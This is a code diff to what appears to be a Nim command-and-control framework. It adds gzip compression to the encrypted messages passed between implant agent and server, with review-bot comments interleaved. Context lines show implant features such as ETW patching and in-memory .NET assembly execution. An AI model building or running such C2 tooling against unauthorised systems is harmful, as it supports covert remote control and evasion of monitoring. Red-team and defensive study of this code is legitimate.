diff --git a/conquest.nimble b/conquest.nimble index 27accff..f9f95c3 100644 --- a/conquest.nimble +++ b/conquest.nimble @@ -28,4 +28,5 @@ requires "tiny_sqlite >= 0.2.0" requires "prologue >= 0.6.6" requires "winim >= 3.9.4" requires "ptr_math >= 0.3.0" -requires "imguin >= 1.92.2.0" \ No newline at end of file +requires "imguin >= 1.92.2.0" +requires "zippy >= 0.10.16" \ No newline at end of file diff --git a/src/agent/core/clr.nim b/src/agent/core/clr.nim index ec4e685..7f24261 100644 --- a/src/agent/core/clr.nim +++ b/src/agent/core/clr.nim @@ -34,7 +34,6 @@ proc etwPatch(pThreadCtx: PCONTEXT) = Arguments: - assemblyBytes: Serialized .NET assembly - arguments: seq[string] of arguments that should be passed to the function - Returns: CLR Version and assembly output ]# proc dotnetInlineExecuteGetOutput*(assemblyBytes: seq[byte], arguments: seq[string] = @[]): tuple[assembly, output: string] = diff --git a/src/agent/protocol/heartbeat.nim b/src/agent/protocol/heartbeat.nim index 8a480b8..51928c4 100644 --- a/src/agent/protocol/heartbeat.nim +++ b/src/agent/protocol/heartbeat.nim @@ -1,5 +1,4 @@ -import times - +import times, zippy import ../../common/[types, serialize, sequence, utils, crypto] proc createHeartbeat*(ctx: AgentCtx): Heartbeat = @@ -31,8 +30,11 @@ proc serializeHeartbeat*(ctx: AgentCtx, request: var Heartbeat): seq[byte] = let body = packer.pack() packer.reset() + # Compress payload body + let compressedPayload = compress(body, BestCompression, dfGzip) + # Encrypt check-in / heartbeat request body - let (encData, gmac) = encrypt(ctx.sessionKey, request.header.iv, body, request.header.seqNr) + let (encData, gmac) = encrypt(ctx.sessionKey, request.header.iv, compressedPayload, request.header.seqNr) # Set authentication tag (GMAC) request.header.gmac = gmac diff --git a/src/agent/protocol/registration.nim b/src/agent/protocol/registration.nim index f0664d0..42cc894 100644 --- a/src/agent/protocol/registration.nim 
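Review bot: The new `requires "zippy >= 0.10.16"` sets only a lower bound, so a fresh build resolves to whichever zippy release is newest at that time. This package now inflates data received from the network in src/server/protocol/packer.nim, so the version that gets built should be one that was reviewed. Pinning an exact version or committing a nimble lock file would achieve that. The other requirements in this file use the same `>=` form, and a lock file may already exist outside this diff.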
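Review bot: The length written into the packet header is not touched by this hunk in serializeHeartbeat, although the encrypted body is now the gzip output rather than `body`. serializeTask in src/server/protocol/packer.nim is changed in this same commit to pass `uint32(encData.len)` to `serializeHeader`, and every receiver reads exactly `header.size` bytes before decrypting, so a header call that still passes the uncompressed length would make the receiver read the wrong number of bytes. That call lies below the hunk and cannot be seen here, so it needs confirming, and the same question applies to serializeRegistrationData and serializeTaskResult. A comment such as `# header.size is the length of the encrypted, compressed body` next to each call would record the convention.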
+++ b/src/agent/protocol/registration.nim @@ -1,4 +1,4 @@ -import winim, os, net, strformat, strutils, registry, sugar +import winim, os, net, strformat, strutils, registry, zippy import ../../common/[types, serialize, sequence, crypto, utils] @@ -241,8 +241,11 @@ proc serializeRegistrationData*(ctx: AgentCtx, data: var AgentRegistrationData): let metadata = packer.pack() packer.reset() + # Compress payload body + let compressedPayload = compress(metadata, BestCompression, dfGzip) + # Encrypt metadata - let (encData, gmac) = encrypt(ctx.sessionKey, data.header.iv, metadata, data.header.seqNr) + let (encData, gmac) = encrypt(ctx.sessionKey, data.header.iv, compressedPayload, data.header.seqNr) # Set authentication tag (GMAC) data.header.gmac = gmac diff --git a/src/agent/protocol/result.nim b/src/agent/protocol/result.nim index a0d52bc..4344dfe 100644 --- a/src/agent/protocol/result.nim +++ b/src/agent/protocol/result.nim @@ -1,4 +1,4 @@ -import times, sugar +import times, zippy import ../../common/[types, serialize, sequence, crypto, utils] proc createTaskResult*(task: Task, status: StatusType, resultType: ResultType, resultData: seq[byte]): TaskResult = @@ -44,8 +44,11 @@ proc serializeTaskResult*(ctx: AgentCtx, taskResult: var TaskResult): seq[byte] let body = packer.pack() packer.reset() + # Compress payload + let compressedPayload = compress(body, BestCompression, dfGzip) + # Encrypt result body - let (encData, gmac) = encrypt(ctx.sessionKey, taskResult.header.iv, body, taskResult.header.seqNr) + let (encData, gmac) = encrypt(ctx.sessionKey, taskResult.header.iv, compressedPayload, taskResult.header.seqNr) # Set authentication tag (GMAC) taskResult.header.gmac = gmac diff --git a/src/agent/protocol/task.nim b/src/agent/protocol/task.nim index b63f4c7..bb032fb 100644 --- a/src/agent/protocol/task.nim +++ b/src/agent/protocol/task.nim 
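Review bot: `sugar` is dropped from the import line here rather than `zippy` simply being appended, and the same swap is made in src/agent/protocol/result.nim and src/agent/protocol/task.nim. The rest of these modules is outside the diff, so it cannot be seen whether `=>`, `collect` or other `sugar` helpers are still used; if any are, the module no longer compiles. If the removal is deliberate clean-up of an unused import, it would read more clearly as its own commit or as a line in the commit message.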
@@ -1,4 +1,4 @@ -import strutils, tables, json, strformat, sugar +import strutils, tables, json, strformat, zippy import ./result import ../../modules/manager @@ -20,11 +20,14 @@ proc deserializeTask*(ctx: AgentCtx, bytes: seq[byte]): Task = validatePacket(header, cast[uint8](MSG_TASK)) # Decrypt payload - let payload = unpacker.getBytes(int(header.size)) - let decData= validateDecryption(ctx.sessionKey, header.iv, payload, header.seqNr, header) + let compressedPayload = unpacker.getBytes(int(header.size)) + let decData = validateDecryption(ctx.sessionKey, header.iv, compressedPayload, header.seqNr, header) + + # Decompress payload + let payload = uncompress(decData, dfGzip) # Deserialize decrypted data - unpacker = Unpacker.init(Bytes.toString(decData)) + unpacker = Unpacker.init(Bytes.toString(payload)) let taskId = unpacker.getUint32() diff --git a/src/server/protocol/packer.nim b/src/server/protocol/packer.nim index 8b71749..e3c117c 100644 --- a/src/server/protocol/packer.nim +++ b/src/server/protocol/packer.nim @@ -1,4 +1,4 @@ -import strutils, streams, times, tables +import strutils, streams, times, tables, zippy import ../../common/[types, utils, serialize, sequence, crypto] proc serializeTask*(cq: Conquest, task: var Task): seq[byte] = 
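Review bot: `uncompress(decData, dfGzip)` in deserializeTask is called with no bound on the size of its output and no handling of the `ZippyError` it raises on malformed input. `header.size` limits only the compressed length, so a small packet can inflate to a very large buffer before `Unpacker.init` sees it. The same line is added to deserializeTaskResult, deserializeNewAgent and deserializeHeartbeat in src/server/protocol/packer.nim. deserializeNewAgent looks the most exposed, because its session key is derived from `agentPublicKey`, which appears to be read from the packet itself, so the sender need not be a registered agent. Since `uncompress` returns the whole result at once, the practical guard is a cap before the call, e.g. `if decData.len > MaxCompressedLen: raise newException(ValueError, "payload too large")` (`MaxCompressedLen` is a placeholder for a limit the project chooses), plus catching `ZippyError` wherever other packet-validation failures are handled; the function body continues outside this hunk.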
@@ -19,14 +19,17 @@ proc serializeTask*(cq: Conquest, task: var Task): seq[byte] = let payload = packer.pack() packer.reset() + # Compress payload body + let compressedPayload = compress(payload, BestCompression, dfGzip) + # Encrypt payload body - let (encData, gmac) = encrypt(cq.agents[Uuid.toString(task.header.agentId)].sessionKey, task.header.iv, payload, task.header.seqNr) + let (encData, gmac) = encrypt(cq.agents[Uuid.toString(task.header.agentId)].sessionKey, task.header.iv, compressedPayload, task.header.seqNr) # Set authentication tag (GMAC) task.header.gmac = gmac # Serialize header - let header = packer.serializeHeader(task.header, uint32(payload.len)) + let header = packer.serializeHeader(task.header, uint32(encData.len)) return header & encData @@ -40,11 +43,14 @@ proc deserializeTaskResult*(cq: Conquest, resultData: seq[byte]): TaskResult = validatePacket(header, cast[uint8](MSG_RESULT)) # Decrypt payload - let payload = unpacker.getBytes(int(header.size)) - let decData= validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, payload, header.seqNr, header) + let compressedPayload = unpacker.getBytes(int(header.size)) + let decData = validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, compressedPayload, header.seqNr, header) + + # Decompress payload + let payload = uncompress(decData, dfGzip) # Deserialize decrypted data - unpacker = Unpacker.init(Bytes.toString(decData)) + unpacker = Unpacker.init(Bytes.toString(payload)) let taskId = unpacker.getUint32() 
@@ -82,11 +88,14 @@ proc deserializeNewAgent*(cq: Conquest, data: seq[byte]): Agent = let sessionKey = deriveSessionKey(cq.keyPair, agentPublicKey) # Decrypt payload - let payload = unpacker.getBytes(int(header.size)) - let decData= validateDecryption(sessionKey, header.iv, payload, header.seqNr, header) + let compressedPayload = unpacker.getBytes(int(header.size)) + let decData = validateDecryption(sessionKey, header.iv, compressedPayload, header.seqNr, header) + + # Decompress payload + let payload = uncompress(decData, dfGzip) # Deserialize decrypted data - unpacker = Unpacker.init(Bytes.toString(decData)) + unpacker = Unpacker.init(Bytes.toString(payload)) let listenerId = unpacker.getUint32() @@ -128,11 +137,14 @@ proc deserializeHeartbeat*(cq: Conquest, data: seq[byte]): Heartbeat = validatePacket(header, cast[uint8](MSG_HEARTBEAT)) # Decrypt payload - let payload = unpacker.getBytes(int(header.size)) - let decData= validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, payload, header.seqNr, header) + let compressedPayload = unpacker.getBytes(int(header.size)) + let decData = validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, compressedPayload, header.seqNr, header) + + # Decompress payload + let payload = uncompress(decData, dfGzip) # Deserialize decrypted data - unpacker = Unpacker.init(Bytes.toString(decData)) + unpacker = Unpacker.init(Bytes.toString(payload)) return Heartbeat( header: header,